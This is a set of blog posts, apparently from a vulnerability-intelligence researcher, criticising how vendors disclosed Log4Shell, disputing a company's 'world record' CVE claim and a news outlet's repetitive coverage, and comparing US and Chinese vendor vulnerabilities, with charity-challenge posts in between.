Log4Shell: Redefining Painful Disclosure

Log4Shell is yet another example of why we simply don’t get security right, and it strongly suggests there is little hope for change. There are plenty of blogs and articles that do a great analysis of the vulnerability from the exploitation and impact angle of this vulnerability. There are a lot fewer that examine why the bug exists in the first place, and why it took so long to notice. I’ll briefly touch on that and then look at log4shell from a bigger picture in the context of vendor responses and how they show all the chinks in the armor, enough to demonstrate that we don’t really have a set of armor at all.

If you are familiar with Log4Shell, you may want to skip the next two paragraphs, but part of the abridged summary spells out some CVE assignment confusion and explains how this blog will refer to the various issues.

What is Log4Shell? (Abridged)

On November 30, 2021, a vulnerability was made public in the Apache Log4j library that affected version 2.x but not 1.x. This is largely because, despite the same name, Log4j 2.x represents a complete rewrite of the Log4j 1.x codebase. For ease, I will refer to the library as Log4j in this blog but specifically mean the 2.x version.

The gist of the vulnerability is that when the Log4j library receives user-supplied input, it not only logs the information but has the ability to perform lookup actions. This can result in the execution of arbitrary code. Since logging is frequently implemented in a way to receive user-supplied input, this can represent a significant issue and allow for a trivial compromise of the system. In large enterprises, these logs can be automatically forwarded and consolidated on logging hosts that make administrative work easier. So that simple remote code execution might impact a different system than the one you intended.

The vulnerability was originally assigned CVE-2021-44228 but the initial fix was found to be incomplete. This led to a second CVE assignment, CVE-2021-45046, that immediately started being confused with a very separate issue affecting Log4j 1.x only, and only if the attacker had privileged access to begin with (CVE-2021-4104). Red Hat assigned CVE-2021-4125 to represent the original vulnerability but as applied to their specific products, which is in violation of CVE Numbering Authority (CNA) rules. To add more confusion, the second attempt to fix the original vulnerability resulted in a distinct vulnerability being discovered that resulted in a denial of service and assigned CVE-2021-45105. Finally, yet another flaw was discovered but it too required privileged local access, despite being called “remote” by many, and it was assigned CVE-2021-44832.

This blog will generally talk about the original vulnerability (2021-44228) unless stated otherwise and will be referred to by its nickname “Log4Shell”. Note that while the vulnerability was technically made public on November 30 and the vendor patched it on December 6, it was not widely covered until December 10th.

Log4j History (Abridged)

First, let’s look at a slightly different history of high-risk log4j vulnerabilities, including this one. This will become important in subsequent sections. Note that the severity scores represented are CVSSv2. 

There are three more Log4j vulnerabilities, all without a CVE ID, but scored below 6.9 CVSSv2. On top of CVSS scores, it is also important to note that the current Log4j vulnerability (2021-44228) has been scored CVSSv2 10.0 / CVSSv3 10.0 by NVD. This, along with many other scores, is not correct as they fall into many traps that all stem from not following the CVSS specifications. As VulnDB notes, based on RBS Chief Research Officer Carsten Eiram’s analysis:

The CVSS score for this entry has been updated to reflect adherence to the CVSS scoring guidelines. On the surface this appears to be a CVSSv2 10.0 / CVSSv3 10.0 issue, as reflected in NVD and briefly by RBS. In some scenarios this is an accurate score, in others they are not. However, scoring must be done based on Log4j and the context it runs in, not speculation on possible use-case scenarios. The base score reflects that, and CVSS environmental scores allow an organization to re-cast the score based on their specific environment. So if e.g. a web server is passing user-controlled content to the logs which are then forwarded to a logging host, that represents a scope change and would get scored MS:C. Since Log4j is a library, it would have to be configured / implemented in such a way as to allow user-controlled strings which warrants Access Complexity Medium (AC:M) for CVSSv2, leading to a 9.3 score. In this case, AC:M is used for just that and does not represent user interaction required, which is often what AC:M designates. As always for libraries, they can only be scored for that *one* product, the library itself. All the products bunding the library will be affected in a myriad of ways that result in different scores, and organizations will have to tweak those scores depending on their individual configurations. A re-based score may be derived for different business units or applications even, depending on the organization’s security workflow.

Carsten Eiram, Chief Research Officer, Risk Based Security

This same scoring issue can be seen with NVD and CVE-2019-17571 (v2 7.5 / v3 9.8) as well as NVD’s score for CVE-2017-5645 (v2 7.5 / v3 9.8). The discrepancy between the v2 and v3 scores immediately stand out since their v2 score assumes the library runs with lower privileges (C:P/I:P/A:P) while their v3 score reflects that it may run with higher privileges (C:C/I:C/A:C). NVD’s scoring of Log4j issues giving it a 10 / 10 score does not follow specifications and the v3 score is scored (scope changed) with specific scenarios in mind that are not default. 

Regardless of these scores, 2021-44228, 2019-17571, and 2017-5645 should all be treated equally as serious until an organization determines how it impacts them. In reality? That isn’t the case and it doesn’t make sense, other than the fact that news, researchers, and vendors all cried out that this one is “critical” while the previous vulnerabilities were largely ignored. Very similar to the Struts-Shock vulnerability which made the news primarily because it was used to breach Equifax, while other Apache Struts vulnerabilities didn’t enjoy any attention. Perhaps if the other 21 remote code execution vulnerabilities in Struts had names they too would be better known?

Vendor Disclosure Disappointment

This Log4j vulnerability stands apart from prior issues in the library, even ones with the same severity. We see vendor’s publish advisories calling it a “global event” and that it is “industry-wide“, using language that seems to convey that being vulnerable “couldn’t be helped, it affects everyone!” Sure? While that may be true it begs the question why we see them publish an advisory for Log4Shell but not prior vulnerabilities. In other cases, a vendor may definitively (and ironically)  say that it “affects all service providers using the Log4J Java library” which is also untrue while also saying it “affects certain applications and services” of theirs. This is in addition to a staggering number of vendors publishing advisories saying they are not impacted by the vulnerability, something we have never seen at this volume. Of course, I have to mention the vendors that are “quickly working to assess any potential impact to our clients and the company” … three weeks later.

[1/8/2022 Next two paragraphs updated, thanks to L.P. for the pointer on origin of “LogJam” confusion.]

Despite not being the researchers to discover this vulnerability, LunaSec was one of the first to write an easy-to-digest blog explaining the issue. This is valuable to many administrators that need to quickly understand the risk. However, LunaSec decided to name the vulnerability despite not finding it. They chose “logjam” for the name, oblivious to the fact that Logjam was the name given to the “Diffie–Hellman Key Exchange DHE_EXPORT Cipher Handling Downgrade MitM Weakness” vulnerability back in 2015. That vulnerability didn’t fly under the radar by any means; consider that VulnDB has over 1,000 references for it, meaning many hundreds of vendors wrote advisories and patched it in their software. LunaSec apparently had no knowledge of this vulnerability and didn’t do a simple search for the name before using it. This is amateur hour, extremely counter-productive, and introduces serious confusion around the vulnerability.

Vendors that don’t publish advisories frequently are also more prone to make simple mistakes that introduce confusion. Take Pandora FMS or Kiteworks for example, who conflated Log4Shell with Logjam, no doubt because they saw LunaSec call it that. The two issues are extremely different. One is in Apache’s Log4J library and the other in the Diffie–Hellman Key Exchange that requires a privileged network position to intercept traffic. But this mistake isn’t just the domain of those new to security advisories as Micro Focus has decades of sharing vulnerability information, typically in changelogs instead of formal advisories, made the same mistake. You might chalk this up to a simple error, but remember that Micro Focus wrote at least five advisories referencing LogJam. [1] [2] [3] [4] [5]

For those using CVE IDs to track this vulnerability it can get confusing. Log4Shell has three associated CVE IDs: the original (2021-44228), the incomplete fix (2021-45046), and a duplicate assignment from a CNA (2021-4125). Then we have waves of incorrect CVE IDs being used, typically transposed number typos. This may cause someone to think there is yet another Log4J vulnerability though, or cause them to miss an advisory as they are searching for the correct CVEs. We can see some examples from researchers (2021-4438), bloggers and universities (2021-44248), companies (2021-44248), security news (2021-44882), vendors (2021-45056), security companies (2021-44226) and likely more variations. There are more incorrect CVE IDs attributed to this vulnerability than correct ones.

In many cases, it is the first time we see an advisory from hundreds of companies, despite them  “caring deeply” and “taking your security seriously“. Yes, they responded quickly to this vulnerability, but why not the rest? Why aren’t there advisories on any of the vulnerabilities specific to your code? Why no advisories about other third-party library vulnerabilities? It only proves they didn’t care about all the prior vulnerabilities because there simply wasn’t the same level of public attention. They don’t care enough to let you know of the risk of dozens or hundreds of other vulnerabilities, but somehow they “deeply care“.

Dozens of vendors are publishing advisories that are only available to paying customers. When a vendor publishes behind a paywall it makes it difficult for many teams to access that information. While Alice and Bob from the security team may have access, Christine, Dave, Eve, and Frank may not. In other cases the IT/networking team may have access to the account in order to download new firmware, but the security team does not. Those restricted advisories also stay out of reach of third parties that aggregate that information, many of which are retained to provide vulnerability intelligence to the mutual customer. These companies don’t want to check hundreds of vendors for security updates every day; they want someone else to. 

This also applies to vendors that say they will contact customers directly who require updates or publish an anemic advisory saying you need to contact customer service or “contact our support department for product-specific questions“. In many cases those notifications are not going to the appropriate people. Some accounts are set up by different divisions or managers that handle vendor accounts. In other cases there is employee turnover so that vendors are contacting people who left the company.

There are vendors that may understand the issue, may respond accordingly, but turn around and do not communicate that well to customers. For example, L-Soft’s advisory says that one version of their software uses Log4j 2.15.0 “and is therefore not vulnerable to CVE-2021-44228 (Log4Shell) but may still be vulnerable to CVE-2021-45046 and CVE-2021-45105“. This is incorrect, as 2.15.0 is vulnerable to Log4Shell in many instances. If it doesn’t affect them due to configuration then the advisory should specifically say that.

How and where vendors choose to disclose can also prove to be problematic. Modern large organizations may literally use products and services from thousands of vendors. That is why they don’t want to try to monitor them all for security updates, and it is easy to understand why. In addition to monitoring vendor security advisories, knowledge bases, wikis, support forums, and email distributions, some vendors opt to disclose elsewhere. In the case of Log4Shell, we’re seeing that happen on Twitter and Reddit

In other cases we are seeing “advisories” being shared on GitHub in an image (PNG), which doesn’t let you cut & paste the text. When the article isn’t in your native language, it’s basically worthless since you can’t trivially translate it. It reminds me of vendors that publish changelogs or advisories in PDF format, but have disabled the copy & paste functionality in it. 

The researcher SwitHack has done an incredible job collecting vendor advisories related to Log4Shell, but in doing so, has created a similar situation where disclosures happen in comments to their Gist. This collection of references also highlights the problem of “linkrot”; when a link goes 404 and the content is moved or removed completely. It’s been less than one month and half a dozen references are already 404. Some vendors publish their advisory in a place that almost guarantees it will move or vanish in time.

For those who rely on the version of software to track vulnerabilities, this is typically the best approach. In some cases, vendors work against your efforts when they say “The following product IS affected: AppDev Pack versions 1.0.5 – 1.0.11” and then “As of this writing the latest release of AppDev Pack, version 1.0.11, updates the referenced version of log4j2 to 2.15.0.” In this case, not only do you have to download the same version of the software as of a given date, you are still not protected weeks later because it only updates Log4J to 2.15.0 instead of 2.17.0 which resolves all of the known issues.

There is another type of vendor that likes conveying information in tables. For some data that is great, but for vulnerability information it can often be more difficult to process. Solace decided to share their matrices in image format that are basically unreadable as is. You have to copy the image URL and load it in a new tab to read it, since they aren’t even clickable links. HCL Technologies gives us one table to decipher, a word I use with reason. This handy table will let you figure out if you are impacted:

When it comes to clarity in vulnerability disclosure it can be tricky in a case like Log4Shell, given it has three CVE IDs and additional vulnerabilities were discovered within days of the original disclosure. However, when a vendor references three CVE IDs for Log4J vulnerabilities and then decides to also include a 2018 vulnerability in Log4Net, which is not affected by the Log4Shell issue, it can introduce confusion. Specific to Log4J, some of the initial confusion came in the form of version 1.x versus 2.x. While they share the same name, Log4J, version 2.x was a complete rewrite of 1.x and doesn’t share much beyond the name. Given that several vulnerabilities do not affect 1.x while one vulnerability affects 1.x and not 2.x, it’s messy. So a vendor responding to the Log4Shell vulnerability (in 2.x) proudly saying something like “We’re not vulnerable, we use 1.x!” and then not mentioning if they are impacted by CVE-2021-4104 (in 1.x) is frustrating.

If all of this seems discouraging and you better appreciate some frustrations around vulnerability intelligence, consider this; not even the vendor, Apache, gets it right. Three weeks after Log4Shell was disclosed, the Apache blog aggregating information about their own products is missing information (Daffodil, HBase, ManifoldCF, etc.) and incorrect about some (Geode, Jena, etc.).If the vendor can’t aggregate accurate and timely information on their own product portfolio, what hope do the rest of us have?

Keeping Up

As you can see from the ‘Disclosure Disappointments’ above, trying to stay current with the Log4Shell vulnerability is a nightmare. VulnDB is currently cataloging over 1,100 vendor advisories in addition to vendor specific solution references, exploits, and a wide variety of additional references. In less than 30 days, VulnDB 275958 (Log4Shell) has more references than Spectre, Meltdown, SWEET32, SLOTH, FREAK, Shellshock, Heartbleed, and Logjam. The only vulnerability with more references right now is POODLE, but that is likely to change in the coming weeks as more vendors finally publish their advisories.

Every day the VulnDB team continues to scour vendor web sites, Twitter, GitHub, and other sources looking for more information. When a new advisory is found we have to determine if any information needs to be cataloged and update the entry accordingly. Consider adding one reference or one vendor/product/version combination or updating one field as a single data point, and imagine what that looks like. As of this blog, that is 9,749 points of data which is staggering for one vulnerability, especially for one published less than a month ago. Here’s what that looks like:

You can see when the news sank in and vendors really started responding to it. For the next half year or more, that entry will keep getting updated. For those who think that managing a vulnerability database is “just collecting public information“, you are right. But summiting Mount Everest is also just “walking up that hill“.

What can you do? The customers have the power here. If your vendor releases a poorly worded advisory, or this is their very first advisory, take them to task. You must hold them accountable and be ready to switch vendors, which is painful I know, so that your money can teach them a lesson. Demand not only better security practices from your vendors, but better communication about vulnerabilities that impact you. Unfortunately, that threat of switching vendors is typically an empty one, and vendors know it.

Based on everything above, enumerating many of the failures around disclosing a single vulnerability, it’s hard to imagine our industry has much hope. How can organizations really expect to maintain security in the face of vendors that say they care, but act otherwise? Vendors and the information security sector are expected to provide a level of defense that will repel attackers. Unfortunately, we’re our own worst enemy and the staggering number of data breaches are evidence of that. But hey, at least we put on a good show.

Privasec’s Ridiculous Claim of a “World Record” in Vulnerability Disclosure

On May 9, 2019, Privasec published an odd press release with a URL slug of “privasec-queensland-telstra-acquisition” but a title of “Privasec Red’s Consultant Breaks World Record By Disclosing Most Number Of Open-Source CVEs.” This claim is simply wrong. To believe it requires either a complete understanding of the vulnerability disclosure landscape or intent to deceive. Neither is a good look for a security company.

The Claim

The claim that Sajeeb Asim Lohani (a.k.a. sml555 a.k.a. ProDigySML) has disclosed 120 vulnerabilities and it is a record that is fairly trivial to debunk. I say fairly trivial because it requires a good vulnerability dataset that tracks creditee information. Since CVE / NVD do not do that, I am curious how Privasec came to their conclusion. SecurityFocus’ BID and IBM X-Force are public databases that track creditee, but neither allow for a way to readily poll for that statistic. Even scraping that data, mangling it, and making a local searchable dataset should quickly show that 120 is probably not the record. [Update: IBM XFD shows 60 total]. So Privasec’s first mistake is not disclaiming how they determined their claim.

The Debunking

Using VulnDB, which also tracks creditee and makes it easy to search along with statistics around the researcher, I don’t even see 120 vulnerabilities creditee to Lohani. This is after combining three separate creditees, Lohani, sml555, and ProDigySML, that were all one into a single creditee. That yielded 78 vulnerabilities:

Why 78 vs the claimed 120, regardless if the most or not? There are several possibilities here and they may be mutually inclusive. The easiest explanation is there are over 40 disclosures by Lohani that have not been aggregated by VulnDB. Given the historical data and thousands of sources monitored, that would be a bit suspect. Given that he “was nominated for AISA Rookie of the Year in 2017“, that suggests this isn’t an issue of disclosures being historical and the data being incomplete.

Another possibility is that Privasec is trying to hide behind a single word in this press release. Note that it says he “has broken the world record by privately disclosing 120 Open-Source CVEs.” The problem with trying to use this as an out is that how do they know how many other vulnerabilities were privately disclosed? Besides, they also make a point to say “Open-Source CVEs”, which presumably means “public” CVEs. This on top of the PR headline not qualifying their claim at all.

One last possibility is that there are over 40 more of his vulnerabilities with a CVE, but all in RESERVED status. If that was the case, you’d expect them to have contacted MITRE to get them published; after all, they do say “open-source” Additionally, they likely don’t have knowledge of the RESERVED entries that are actually public, which numbers in the thousands.

The Counter

If not Lohani, who has the most vulnerabilities to their name? Probably Mateusz Jurczyk (j00ru) but I would have to do some more data massaging to verify it. He (1,717) and Gynvael Coldwind (1,143) both come to mind for an incredible number of vulnerabilities, many disclosed together. Another name from a ways back is r0t (811), who rode the web application wave with many XSS and file inclusion vulnerabilities. Compare any of those to Lohani with his 120 claim as the “world record” and you can see it is quite absurd. Hell, Jurczyk has more Microsoft Windows vulnerabilities with a CVE assignment than Lohani has in total. It’s clear Privasec didn’t do their homework, or simply didn’t care to.

The Offer

Am I wrong? Possibly. I outlined several reasons why the numbers might be off on either side. So I have an offer for Lohani and Privasec; prove me wrong. It’s quite simple too, since you have the data used for the 120 figure. Share a list of Lohani’s vulnerabilities with me. A simple list of the CVE IDs is all I need, I will do the heavy lifting to verify that number is accurate. You’re still wrong about that “world record” either way, that is proven above. But I would love to see the list of 120 you claim regardless.

The Charity Challenge for Banshee

Unfortunately for them, the fax machine was invented in 1843. Banshee admitted defeat, so Durian it is! But I wanted to give some encouragement and started a charity pledge drive. Of course, me being me, I created a tracking sheet for this and as of this blog, there is already $1945 in pledges to help support Love and Justice in the Streets.

Since Durian isn’t in season, Banshee is going to consume it at the next DEF CON in front of witnesses to make it official. Until then, I’d love to see more pledges! Send me a tweet and tag @banasidhe in it!

Exotic Tropical Tropical Fruit Durian Malaysia

Forbes: Lazy Vulnerability Reporting & A Bit of Bias

It may have been almost two decades ago, I joked with colleagues that many Information Security news articles could just be done via Mad Libs. We later joked that breach notifications often appeared to be done via Mad Libs, using the same phrases with different organization names and the number of affected customers. Over the last few years, it seems Forbes has gotten lazy in their reporting on computer vulnerabilities.

First, a bit of background by querying Risk Based Security’s VulnDB, which I work on. While we track news articles on vulnerabilities, it is important to note that it is done in a best faith effort. We try to capture higher profile articles in the bigger publications within InfoSec and those outside the proverbial “echo chamber”, which includes Forbes, New York Times, Washington Post, Fox, etc. So by no means is this comprehensive, but it is important to understand the methodology which is using Google Alerts based on “CVE” strings. This started several years ago, maybe around 2015 give or take. Articles included before that were as they came across social media, referenced in modern disclosures, or some other current manner despite the publication date.

The first Forbes article we have associated goes back to June 17, 2001, covering a vulnerability in a GE Healthcare device. Up to 2010, almost every Forbes article we have is in a GE device along with one about Oracle and one about Linux Kernel. That alone is kind of interesting. From 2010 to 2020 we have Forbes articles covering a wide variety of vendors including Google, Onity, GE, Apple, Magento, PLX, and more. They also included articles covering big disclosures that covered multiple vendors of DVR systems, SIM cards, micro processors, and more. Last year, in 2020, Forbes produces a steady stream of articles for all the big vendors including Cisco, Microsoft, Apple, Google, Intel, Citrix, Zoom, and more.

This year though, it seems like Forbes got lazy. Perhaps it is burnout writing what is essentially the same article? You might think that, but no, because that is exactly what they started doing. Coverage is heavily based around Google Chrome and components in it, but disclosed via Google Chrome’s blog. Of the 48 vulnerabilities in 2021 cataloged by VulnDB, that have an associated Forbes article, only 12 are in non-Chrome products. What’s the gist of their coverage? Here’s three examples, see if you notice the similarities.

You may see the common phrase, “2 Billion Chrome Users”. Don’t worry, in a recent article that got increased to 2.6 billion! If it isn’t in the headline, you can find the phrase in almost every article talking about Chrome vulnerabilities. I get that these articles are repetitive, because there are only so many ways you can say Google fixed vulnerabilities in their browser.

That said, what’s more interesting to me is that they appear to have a single similar article for Mozilla Firefox vulnerabilities in all their time while continuing to encourage users to ditch Chrome. If I didn’t know better, I might think Forbes has chosen a side in the browser wars.

An 83 Word Excuse Instead of a 1 Character Fix (NCSC.nl)

The National Cyber Security Center of the Netherlands (NCSC.nl) has a curious take on sharing security information. On October 25, 2021 I contacted them to inform them of a simple typo in one of their advisories. I send mails or Tweets like this several times a week to researchers, vendors, and news outlets as CVE typos are prevalent. The issue is that a mistyped CVE ID can cause a lot of headache for organizations that take vulnerability intelligence seriously. Imagine an alert about a new CVE affecting enterprise software running your most critical assets and you can only find a news article on it saying the issue is critical. The vendor advisory doesn’t reference it and almost nothing to be found on Google or social media. What do you do? Before you spin up the entire team and tell them to stay late planning for emergency remediation, you need to know what you are dealing with.

Most of the time, the Tweets and emails get a quick reply acknowledging it was a typo and they fix it when possible. Every so often I get no reply and the typo stays there, likely forever. That typically happens on sites that appear to be automated aggregation of content for the sole purpose of getting clicks to generate ad revenue. They have no contact information, no social media, and no author bylines. Otherwise, generally such notifications are well received.

In the case of NCSC.nl I figured I would get a prompt reply and a quick fix. I got the prompt reply, but not the fix. First, note that they provide limited advisory services notifying their stakeholders of vulnerabilities and a page describing what the advisories are. They also have a PDF with a bigger explanation of what a security advisory is. Per Google translate, the advisories “… aim is to describe what the vulnerability is and what could possibly happen if it is exploited.” Simple and straight-forward. As most security professionals know, accuracy in an advisory is important. A typo in a CVE could point to the wrong vulnerability which might be the wrong software completely, or the right software and the wrong vulnerability. I contacted their info@ to let them know about the typo:

https://advisories.ncsc.nl/advisory?id=NCSC-2021-0840

[..] CVE-2021-3715 , CVE-2021-38160 , CVE-2021-4049 [Link]

That should be CVE-2021-40490 at the end.

Brian

The prompt reply I received the next morning was rather baffling. They ‘investigated’ the issue, confirmed I was correct, and wrote a 62 word reply over six lines instead of just fixing the single character that was missing.

Thank you for your e-mail. Hereby we confirm that we have received your
email and investigated the issue. We would like to thank you for your
friendly remark. However, we have decided not to update the
advisory as the CVE number is written correctly in other places in the
advisory.
Feel free to contact us again if there are any questions left.

I naturally questioned them on this odd reply and refusal to fix an inaccurate CVE identifier:

Yes, I have questions.

Why wouldn’t you correct a simple typo? More specifically, for a CVE ID that can cause confusion for security practitioners trying to ensure they have accurate vulnerability intelligence. Anyone reading your advisory may go down a proverbial rabbit hole trying to figure out what CVE-2021-4049 represents and waste considerable time.

Consider that that typo caused our team to respond trying to figure out what that ID represents. Fortunately, we have amazing vulnerability intelligence and it was fairly easy to deduce what happened.

Your apathy in this matter is staggering.

I hoped that an explanation, with a bit of shaming, might prompt them to just fix the single missing character. Nope…

Thank you for your e-mail. We appreciate your concerns. When the advisory
needs to be updated the typo will be corrected.

OK, but the advisory literally needs to be updated to fix the typo. This recursive excuse is just absurd. 21 word reply this time instead of a one character fix. They appreciate my concerns, but not enough to fix ONE CHARACTER.

It’s hard to have faith in Information Security when a national security center doesn’t understand the importance of accuracy and integrity. I hope organizations in the Netherlands are not relying on the NCSC.

The Charity Challenge for The Only Mike E.

Well, maybe not the only one, but this one promises to be fun! It started with such a harmless Tweet, essentially Mike digging his own mouth-hole grave. From there it really spiraled out of control and it just keeps getting better.

This evening I put my Amazon skills where his mouth is and sent items, along with the offers to donate to charity on his behalf. Here’s how it works:

  • I send him a food(ish) item.
  • He has to consume it in some fashion. Restrictions or requirements may apply.
  • He posts a picture or video of consumption.
  • We believe he won’t hoodwink us.
  • I donate to the charity of his choice!

If he completes all of the challenges below, to their fullest potential, he will raise $1,700 for charity. That said, we are both hoping that others will offer to donate a few bucks to see these challenges go down. Even better, if anyone will offer to match even one of the challenges, we could all do a lot of good here. At Mike’s expense, so really doing two types of good. If you’d like to pledge, send a tweet to @attritionorg with which challenge(s) you would like to sponsor and the charity pledge amount. Those who pledge will be added at the end of this blog!

Challenge #1: Blair’s Ultra Death Sauce! This is rated between 800,000 and 1,100,000 SHU depending on the site you read. Either way, this will bring some spice into his life. It may also cause him not to do #UnicornChef for a week as his taste buds regrow. This sauce is reportedly the hottest sauce that they have made, hotter than their “Mega Death” sauce. What’s in it? Red Habanero Pods, Cayenne Chiles, White Vinegar, Natural Pepper Flavor (contains Sotbean Oil), Tomato Puree, Pirri-Pirri Chiles, Pumpkin Seed, Lime Juice, Salt, and Spices. Look at that… tomatoes, lime juice, pumpkin seed, salt, and spices. All ingredients he has probably cooked with, so this one is an easy one. The bounty: $100 for eating a cracker or similar with a healthy dash of the sauce or $200 for shaking several dashes of sauce directly into his mouth-hole. An extra $50 for using it to prank his wife on video.

Challenge #2: Mrs. Butterworth’s Sugar Free Syrup! Note that I was generous and got him the sugar-free version of this. As a type-1 diabetic, I only want him to hate his mouth, not his pancreas. Anyway, this challenge is simple! Anyone familiar with the movie Super Troopers knows how this goes. Here’s a video clip reminder. Just tilt the head back, open the mouth-hole, and chug it down like a syrup pro. The bounty: $100 for chugging a quarter of the bottle. $200 for chugging half the bottle. $500 for chugging the entire thing in the same approximate time as we see in the movie.

Challenge #3: Fatworks, Pasture Raised Leaf Lard, a.k.a. “Baker’s Lard”, Artisanally Rendered, for Traditional & Gourmet Baking, Sautéing, and Frying. Bonus… this is keto and paleo friendly! This was Apacid’s idea along with the syrup. He’s quite sick in the head. I think one large spoonful stuffed into his mouth-hole to “chew” on is a sufficient challenge, then he can use the rest for cooking. No extra flavoring, no additives, just a nice chunk of pure lard. The bounty: $100 for a large spoonful. Bonus, he can redeem this bounty up to three times if done on the same day!

Challenge #4: Not believing these were good enough, then Mike made the mistake of proposing his own challenge to which I quickly agreed. “I’ll eat a bowl of dog kibble in maple syrup for your animal shelters out there.” If he completes all of the second challenge he’ll have to use his own maple syrup for this one. He gets to pick his favorite dog kibble and syrup, and eat at his leisure. Of course, if he drowns it in enough syrup he won’t taste the kibble but that is up to him. The bounty: $250 for the entire bowl, to the animal charity of his choice. He has chosen the New Hampshire SPCA for this one.


Pledgers:

  • John Rex – $100 for each of the first four challenges. [ref]

Assessing the ‘War on Tech’: Huawei vs. U.S.

[I wrote this with Curtis Kang who did a lot of work researching various aspects of this article and provided invaluable help. His research and written contributions made this article possible. It was originally intended to be published on RiskBasedSecurity.com in early 2020 but was passed over so I am publishing it here.]


In 2019, we saw the steadily-growing social and policy conflicts between the United States and China reach a boiling point. China has been a major talking-point of President Trump’s platform since early in his campaign. However, it wasn’t until last year that we saw active policies enforcing a so-called “war on tech” between the U.S. and major Chinese companies like Huawei and ZTE, and those policies being “sidestepped”. We wanted to examine this from a data perspective, looking at the vulnerabilities in similar companies from both sides.

To set the stage, it is useful to briefly revisit the U.S. vs CN timeline.

The Trade War

Since taking office in January 2017, President Trump has had a specific interest in China, stating early-on that the “U.S. will be on a level playing field”. This led to several rounds of tariffs being imposed against China starting in March 2018, and retaliatory tariffs being imposed against the U.S. Early in 2019, there was conjecture that President Trump may use an executive order to limit some U.S. companies such as wireless carriers from purchasing Chinese electronic devices. That executive order was signed on May 15, 2019, citing the National Emergencies Act (50 U.S.C. 1601 et seq.) that would limit or ban purchases of “technology or services designed, developed, manufactured, or supplied, by persons owned by, controlled by, or subject to the jurisdiction or direction of a foreign adversary”.

While the executive order did not list any country or company, it was widely accepted that it was a move against Huawei in particular. The order contained interesting language, saying that the banned technology or services “poses an undue risk of sabotage” and is “an unacceptable risk” to the United States, among other wording. Technology meeting those criteria would be determined by the Secretary of Commerce, in consultation with nine other bodies “and as appropriate, the heads of other executive departments and agencies”.

On May 20, 2019, the BIS modified the final rule and granted a Temporary General License (TGL) until August 19, 2019 for transactions regarding, among other things, “Continued Operation of Existing Networks and Equipment” and “Cybersecurity Research and Vulnerability Disclosure.” On August 19, 2019, the BIS extended the TGL by 90 days, or until November 19, 2019. Outside the TGL, any request for a license to sell or transfer commodities, software or technology to Huawei is reviewed “under a policy of presumption of denial.” In other words, the BIS provides virtually no avenue for a continued commercial relationship with Huawei after November 19, 2019.

Months later, when asked if China would retaliate, Chinese foreign ministry spokesman Geng Shuang told reporters “stay tuned.” Two weeks after that, China announced tariffs on $75 billion of U.S. products. This was followed in December with China announcing a ban on foreign technology in “all government offices and public institutions” within three years. The ban also prevented companies such as Google, Dropbox, and Facebook from being used within China. With this, the United States and China were in a new type of technology war based on the premise that the adversarial nation was producing equipment that “poses an undue risk of catastrophic effects”.

The Fear of Backdoors

Computer equipment that poses a risk in the context above, typically brings to mind computer vulnerabilities. Issues that, with the right knowledge, would allow one country to use software vulnerabilities to compromise assets in the adversary nation’s government, business, or infrastructure. Another common scenario brought up by security professionals and intelligence officials is that of a backdoor; computer code planted by a party that allows them, and only them, covert remote access to the device. Some members of the U.S. intelligence community would prefer these Chinese products not be used in the technological infrastructure saying it “would undercut the ability of the U.S. to defend itself.”

This fear, specifically of Huawei routers from China, has been front-and-center since 2011, and a growing concern even before that. In the past, the concerns largely stemmed from each nation compromising the other’s computer networks in government and business. More recently, with the race to implement a 5G network, security issues around that technology have been heavily scrutinized. This war of technology has reminded us of 2010, when Huawei published an open letter to the U.S. government attempting to allay fears and shift public perception after a decade of suspicion. The company went so far as to request a “thorough investigation” to prove that they are “a normal commercial institution and nothing more.” This prompted eight U.S. senators to urge the White House to examine Huawei contracts and the House Intelligence Committee to investigate and publish a report on both Huawei and ZTE.

Ultimately, that report was inconclusive and stated the following – “despite hours of interviews, extensive and repeated document requests, a review of open-source information, and an open hearing with witnesses from both companies, the Committee remains unsatisfied with the level of cooperation and candor provided by each company.” Even over six years later, in 2019, Adam Segal, director of the Digital and Cyberspace Policy Program at the Council on Foreign Relations, officially stated that no one has found a backdoor in a Huawei product.

This is important to note, given the considerable scrutiny Huawei has received. In addition to their open letter in 2010, Huawei also disclosed their source code to a foreign government, something that no U.S. company has done. Despite the numerous information security companies attempting to find and potentially publish findings of an actual backdoor (including the NSA and specifically created testing centers in the UK), none have been confirmed. Given that the U.S. National Security Agency (NSA) has a significant budget and a vested interest in determining if a company like Huawei is shipping backdoored systems, and has not disclosed one, is compelling.

Ignoring Backdoors and Looking at the Data: Is a Ban Warranted?

Given that history and perspective on the growing tech war between the U.S. and China, we at Risk Based Security wanted to look at some concrete numbers around the vulnerabilities in the companies at the center of the issue.

While much of the focus on this topic has been on fear and the threat of backdoors planted by a vendor at the behest of their government, that is not necessarily where we want to direct attention. Using a backdoor, even if it is well-hidden, would likely bring unwanted attention by giving more positive attribution to those who compromised the machine. Nation-state level hackers would have their own ways into a wide variety of vendors and devices purely based on ‘natural’ vulnerabilities in the code. They simply do not need the access, and risk, a backdoor provides. Why provide hints to the enemy that you’ve “cracked the code” when you could hide behind an existing vulnerability?

Setting aside the possibility of backdoors, the question we’re interested in is this: does one of the government-used devices pose more of a risk due to its vulnerabilities? Despite this, we have found that the “war on tech” cannot be simplified into the classic “how many vulnerabilities are there in…” question, else unspoken bias drastically affects the perceived meaning of the numbers. While there is no way to do a perfect one-to-one comparison of U.S. versus Chinese vendors, there may be some that we can begin to compare, with disclaimers.

Phones: BlackBerry vs. Huawei / ZTE

For the general public, and based on much of the mainstream media reporting, Huawei are predominantly associated with their mobile phones. As more of our lives move to mobile, it is no surprise that those in power are concerned about the security of their phones and tablets. For U.S. and Chinese governments, it is widely viewed that BlackBerry and Huawei / ZTE phones, respectively, are dominant. For BlackBerry, they announced a five year deal for their latest handheld and their AtHoc software with the federal government back in July 2016, specifically the Department of Defense (DoD) Joint Emergency Mass Notification Systems (JEMNS). According to the press release, the DoD chose Blackberry because of the “secure end-to-end mobility offering .. that [shows the] secure platform is designed to meet their priorities”.

Despite the contract, BlackBerry is not the most widely used phone in the U.S. government. The U.S. Senate officially “ditched” BlackBerry in 2016, but allows them to continue to use specific devices per an official memo. In fact, BlackBerry themselves have stopped making their own handheld devices and have shifted to business software and other solutions like AtHoc, apparently used by 70% of federal employees including DoD, DHS, VA, DoE, DoA, PFPA, FEMA, IRS, and the TSA. For a majority of government employees, the most commonly used phones are now Apple and Samsung products.

